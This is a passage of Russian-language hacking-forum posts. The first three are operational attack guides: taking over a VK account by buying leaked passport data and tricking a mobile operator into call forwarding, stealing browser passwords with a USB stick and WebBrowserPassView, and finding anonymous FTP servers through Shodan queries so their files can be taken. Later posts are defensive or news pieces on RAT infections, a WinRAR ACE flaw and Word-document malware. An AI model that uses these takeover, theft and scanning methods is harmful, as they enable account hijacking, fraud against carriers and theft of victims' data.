вряд ли когда-нибудь ее увидит. Сразу хочу сказать, что рассказываю я об этом только в целях повышения вашей же безопасности Часть первая Итак, чтобы начать первые этапы взлома, нам нужно узнать мобильный номер нашей жертвы, как вы это сделаете меня лично не касается. Однако, если номер указан в контактных данных, то можете обрадоваться – вам очень повезло и нужно будет только проверить правдивость информации. Нам нужно перейти на страничку входа вк, после чего нажать кнопочку “Забыли пароль” после чего скопировав тот самый номер мы его вставляем, появится окно где мы должны ввести имя жертвы, которое указало номер. Если все верно, то мы можем переходить на следующий пункт. Если же нет совпадения, то вы должны проявить свои максимальные силы в СИ, это тоже уже другая история. Однако если вам все же не удалось уломать жертву на номер телефона, то можно попробовать узнать с помощью новейших технологий. Для получения номера нам понадобятся: nomer.iologin.stop-list.infoИменно они станут нашими помощниками. Итак, а теперь мы подумает о том, что если номер телефона мы уже заполучили. То после этого сразу че стоит проверить подключена ли к аккаунту 2-х факторная аутентификация. Ведь если после ввода фамилии высветилось сообщение о том, что код отправлен на электронную почту, то можно сделать вывод о том, что она присутствует. А это может занять еще больше времени, ведь для этого нужно будет провести взлом почты. Однако, как мы знаем рядовые пользователи не особо задумываются о безопасности, а это значит, что найти аккаунт без аутентификации будет не так сложно. Часть вторая На этот этап вы должны переходить уже с номером телефона. Итак, первым делом нам нужно найти сервис, который позволит нам узнать какому оператору принадлежит номер. Если на руках у вас имеется номер и зная оператора, нам нужно будет его пробить. Рассказать о пробивщиках и рекламировать их я не буду, однако могу сказать, что цены начинаются от 400 рублей и обычно не переваливают за 2000 рублей. Вам понадобится пробив во всех случаях кроме билайна, потом расскажу почему. Данные пробива нельзя потерять, они нам понадобятся. Отлично, теперь когда у нас есть пробив по номеру, то нам нужно направить в официальную группу оператора, их вы тоже без труда найдете. И после чего начать им рассказывать какую-то страшную историю о том, что вы находитесь где-то далеко от дома и вам нужно подключение переадресации на новый мобильный номер, чтобы всегда можно было связаться на рабочий номер. Это я написал как пример. Включайте фантазию, придумать можно что угодно, главное чтобы было все правдоподобно. Для этого на понадобятся паспортные данные, получим их мы после пробива. Итак, а теперь что на счет билайна. Они не так глупы, ведь могут попросить у вас не только данные паспорта но и ответить на несколько вопросов, например, на какие суммы пополнялся счет, на какие номера происходили звонки и так далее. Поэтому нужно заказывать пробив с этими данными тоже. Или же можете попробовать пополнить счет на небольшую сумму за небольшой промежуток перед связью с операторами. Часть третья Когда мы получили все необходимые этапы, мы можем выходить на финишную прямую. Следующие действия лучше выполнять ночью, в то время когда активность на сайте минимальная. Нам нужно зайти на сайт вк и нажать на кнопку “Збыли пароль” после чего вводим все данные, телефон, фамилия. Вместо кода нам нужно чтобы нам позвонил робот. В звонке он скажет вам код, после чего вы переходите на страничку, изменяете пароль и устанавливаете 2-х факторную аутентификацию. Отлично, все готово! Теперь вы владелец данной страницы и вряд ли ее будет возможно вернуть, как я и говорил в начале.
-
Привет всем, данная небольшая статейка будет очень полезна для тех, кто хочет сделать стиллер, да не простой стиллер а usb. Есть множество вариантов как это можно воплотить, однако я расскажу про один и он является самым быстрым. Итак, данный стиллер нам поможет воровать пароли а также логины к ним прямо из браузеров. Первым делом нам нужно подготовить все необходимое, а это – флешка с объемом не менее 2 гигабайт, однако советую брать с небольшим запасом. Далее нам нужно скачать программу под названием – WebBrowserPassVies Готово, теперь перекидываем эту прогу на нашу и флешку и после этого мы можем начать атаковать ничего не подозревающих жертв. Чтобы совершить взлом нам нужно вставить данный usb-накопить в компьютер и шустро набрать несколько комбинаций клавиш. Первой является Ctrl + A с помощью нее мы выделим всю необходимую для нас информацию Второй является Ctrl + S с помощью нее мы сохраним все эти данные под любым названием, которое вы захотите. Как только это все сделано вы можете вынимать накопить и покидать место вашей атаки. Этот метод является далеко не самым новым, ведь как я уже говорил ранее – есть огромное множество для создания usb-стиллеров. Но этот метод все еще держится на плаву и является весьма эффективным и требует минимум сил.
-
Привет, анон. Сегодня я расскажу тебе, что такое 21 порт и почему его лучше не держать открытым. Посмотрим, сколько устройств доступны для анонимной авторизации. Я расскажу тебе, как можно автоматизировать поиск и как отсеивать пустые запросы в Shodan. Вся информация предоставлена исключительно в образовательных целях. Что делать с найденной информацией — личный выбор каждого. Что такое FTP? FTP – File Transfer Protocol, это широко распространенный протокол который необходим доя передачи файлов. Он необходим чтобы передавать файлы можно было между системами одной сети. Чтобы это сделать человек подключается к серверу с данным протоколом и с помощью каталога что-то скачивает, загружать или удаляет. Также существую более безопасные версии данных протоколов, а именно – FTPS и SFTP Чтобы получить доступ к серверам с данным протоколом необходимы FTP-клиенты, это специальный программы и их больше множество. Самые популярные из бесплатных это: FilzeZilla, Total Commander, WinSCP и FAR Manager. Как найти открытые FTP-сервера? Как ты уже догадался, некоторые файловые серверы являются открытыми. Достаточно просто найти их, проверить каталоги, загрузить/скачать файлы. Для начала проверим Shodan. Для этого используем вот такой запрос: "230 login successful" port:"21" На момент написания статьи, было 173220 результатов. Лидер открытых FTP — США с результатом 58320 записей. При желании можно отфильтровать результаты по операционным системам и продуктам. Среди ОС популярны: Linux 3.x, Linux 2.6.x и Windows XP. Среди продуктов vsftpd, Pure-FTPd, pyftpdlib, Microsoft ftpd и ProFTPD. Конечно, среди выдачи Shodan существует достаточно много пустышек. Поэтому для тех, кто хочет оптимизировать поиск можно написать софт, который будет подключаться к FTP-серверу и анализировать наличие каталогов и их размер. На выходе получаем полноценный список FTP-серверов. В России ситуация выглядит следующим образом. 10134 результата. Среди компаний лидирует — Mobil-group ltd. Также в списке есть: Rostelecom, Beeline, VimpelCom и REG.RU. Конечно, чтобы улучшить результаты я советую отбирать конкретные модели по заголовкам и искать конкретные устройства. Например, для работы с Xiaomi-девайсами можно использовать заголовок — "220 Welcome to MI-3 FTP service". "230 login successful" "220 Welcome to MI-3 FTP service" port:"21" Список устройств можно существенно расширить. Чтобы лучше разобраться, рекомендую сначала посмотреть устройства: RT-AC66R, RT-AC66U, RT-N66R, RT-N66U, RT-AC56U, RT-N56R, RT-N56U, RT-N14U, RT-N16 и RT-N16R. Можно найти и посмотреть, какие заголовки используются для успешной авторизации без логина и пароля. Вот пример, для одного устройства из списка. "220 Welcome to ASUS RT-N56R FTP service" "230 Login successful." Как подключиться к FTP-серверу? Я покажу на примере FileZilla. Этот клиент имеет простой и понятный интерфейс. В нашем случае достаточно указать IP. После этого нажимаем "Быстрое соединение" и получаем каталоги, которые доступны на FTP-сервере. Среди файлов можно найти очень много разной информации: конфиги, бэкапы, доступы, учетки, загрузки, данные клиентов, документация, фото и т.д. Тут важно разделять личные и корпоративные FTP. Нужно быть готовым, что в первом случае часто будут попадаться фото котиков и записи с детских утренников, во втором более серьезная информация. Что делать с данными — личный выбор каждого. Заключение Все понимают, что критично оставлять открытым 21 порт. Тем не менее, сотни тысяч устройств доступны для анонимного доступа. Я показал, как можно достаточно просто найти файловые хранилища и получить доступ к файлам. Для более серьезной и масштабной работы можно существенно оптимизировать процесс поиска. Очень просто фильтровать сервера по наличию данных и размеру. Также можно оптимизировать поиск для конкретных папок или файлов. Но это уже другая история
-
- сервер
- информация
- (and 12 more)
-
Всем привет, вы как и я хотите иметь максимальную безопасность, однако сделать это невозможно. Поэтому, если мы не может предоставить себе абсолютную безопасность, то мы все же можем ее повысить на более высокий уровень. Итак, немного теории, RAT – это Remote Administration Tool, что в переводу на русский язык – средство удаленного администрирования. Или проще говоря, средство удаленного доступа. При попадании вирус такого типа в вашу систему, как раз таки и позволяет злоумышленникам воровать все ваши данные: пароли, аккаунты и так далее. Первым делом вам нужно знать о том, какие признаки свидетельствуют о том, что вы заражены данным вирусом: 1. Медленная работа интернета 2. Функции троллинга Возможно это вас удивило, но это правда. Вед после заражения злоумышленник может начать в прямом смысле издеваться над вами. Они могут творить разные вещи, от маленьких и безобидных, до и реально страшных. Обычно когда это случается пользователь сразу же выключает компьютер от испуга. 3. Исчезновение ярлыков и файлов на рабочем столе 4. Общение с вами через компьютер. 5. Отключение монитора и открывание дисковода. Я перечислил главные признаки, их может быть и больше. Теперь же поговорим о том как избавиться от вируса и проучить злоумышленника. 1.Если вы хотите наказать взломщика, то вы можете проверить ип-адрес, с которым установлено соединение. 2. После того, как у нас в руках будет IP неприятеля и направляемся в ближайшее отделение правоохранительных органов с жалобой (УК РФ ст. 272) после чего ожидаем результатов. 3. Если вы были заражены таким вирусом, то избавиться от него не составит больших трудов, для этого вам будет нужно воспользоваться утилитами для очистки. 4. Просматриваем все процессы, данный вирус использует трафик, а это значит что фильтрацию нужно производить по трафике, после чего находим подозрительный процесс. Если после закрытия процесса он опять запускается, то нам нужно зайти в систему в безопасном режиме и проделать тоже самое. Если же хотите наказать нарушителя, то советую вам скинуть ратник на свою флешку. 5. Запускаем проверку обычным антивирусом. Отлично, выполнив все эти действия вы сможете избавиться от опасного вируса. На будущее при открытии подозрительный файлов проверять их с помощью ExeInfo
-
Эксперты по безопасности в сфере интернета обнаружили, что WinRar имеет в себе опасную уязвимость. После чего, они же и продемонстрировали, на что способна данная уязвимость. А может она распаковывать файлы не туда, куда указал человек, а в совершенно любое место. Эта уязвимость является очень опасной, так как данным архиватором пользуется более чем 1.5 миллиарда человек. Хочется сказать, что на протяжении всего ее существования была данная уязвимость и ее никто не устранил, а это значит, что очень многие подвержены опасности. Эксперты, после обнаружения уязвимости, сразу же сообщили о ней компании, после чего она была устранена. Поэтому только после устранения был выложен материал о том, как это происходило и как выглядело. Выяснилось, что слабым местом в этом случае была библиотека UNACEV2.DLL. Она является частью практически всех архиваторов в мире, уже как многие годы. А самое важное, что последний раз обновлялась она аж в далеком 2005 году. Данная библиотека необходима, чтобы производит разархивирование файлов формата ACE. Мы все с вами понимаем, что прогресс не стоит на месте, поэтому теперь обнаружить и воспользоваться этой уязвимостей не составляло никаких проблем, так как библиотека не обновляется. Чтобы разархировать файл в необходимое место злоумышленнику, ему нужно будет сделать архив формата ACE. После этого, можно будет совершить обход той директории, что укажет пользователь при распаковке. Эксперты установили вирус в директорию автозапуска, а это значит, что после старта системы оно будет запускать постоянно. Уязвимость была не в одном экземпляре, но их уже устранили в версии 5.70. Хочется сказать, что решение было весьма оригинальным. Так как код данной библиотеки уже давно был утерян, то разработчики решили просто отказаться от формата ACE. Разработчики популярного архиватора советую всем как можно скорее обновить программу, так как это сможет обезопасить их. Так же они рекомендовали не распаковывать архивы имеющие формат ACE, это также уменьшает риски проникновения вредного ПО на ваш компьютер. Нельзя быть уверенным в том, что раньше эту уязвимость не использовали. Но как я уже говорил, более чем 1.5 миллиардов людей под угрозой.
-
Всем привет, недавно моему другу написал один человек, предлагал ему некую схему для его группы. Ну друган мой конечно же согласился, но после того как тот скинул документ, его сразу же раскусили и послали куда подальше. Все это было связанно с текстовым документом Word. И так как я непосредственно работаю в этой среди, даже создавая эту статью, то я посчитал долгом рассказать о способе заражения компьютера через Word. В чем же суть данного способа? Чтобы совершить данную атаку, вам придется всеми силами своего красноречия заставить человека открыть документ Word, который вы конечно же ему отправили. А весь сок в том, что после открытия этого документа никаких уведомлений или предупреждений не будет. После того как он будет запущен, будет произведено включение OLE объекта, который ведь на внешние ресурсы. Дальше, как говорили эксперты, на ваш компьютер скачивается файл формата .rtf прямо с сервера злоумышленников. Происходит расшифровка содержимого данного файла, который производит запуск файла HTA, который как раз-таки запустит скрипт PowerShell и после этого как раз таки произойдет заражение каким-то малварем. Это позволит злоумышленнику получать много данных с вашего компьютера, пароли, адреса и так далее, которые потом могут использоваться в корыстных целях. В прошлом годы эксперты обнаружили, что способ заражения операционных системы Windows, который совершался благодаря давно устаревшему DDE, однако все еще поддерживаемого, позволит какому-нибудь файлу выполнять команды, которые будут находится в иных файлах. С помощью этого способа хакеры смогли засунуть в документ малварь, который будет загружать другие вредоносные скрипты и программы уже с интернета. То есть, после того, как жертва запустили документ с имеющимся там вирусом, то тот код, который там находился начинает подключаться к серверам злоумышленников, после чего устанавливая на компьютер различное вредоносное программное обеспеченье. То есть если хакеры обнаружат, что жертва располагает интересной и полезной информацией, то в бой могут пойти уже очень опасные и крайне эффективные шпионские вирусы, способные получить чуть ли не все данные. Из всего этого можно сделать вывод, что получить ваши личные данные очень просто, особенно если вы ведете себя не внимательно и слишком доверчиво. Ведь как мы с вами прекрасно знаем, бесплатны сыр только вы мышеловке. Поэтому чтобы избежать подобной утечке данных, нужно тщательно проверять источники скачивания файлов, а также избегать тех людей, которые явно пытаются вас надурить и вынудить на открытие файла. статья - Распространение вирусов через Word
-
- вирус
- вирусная программа
-
(and 9 more)
Tagged with: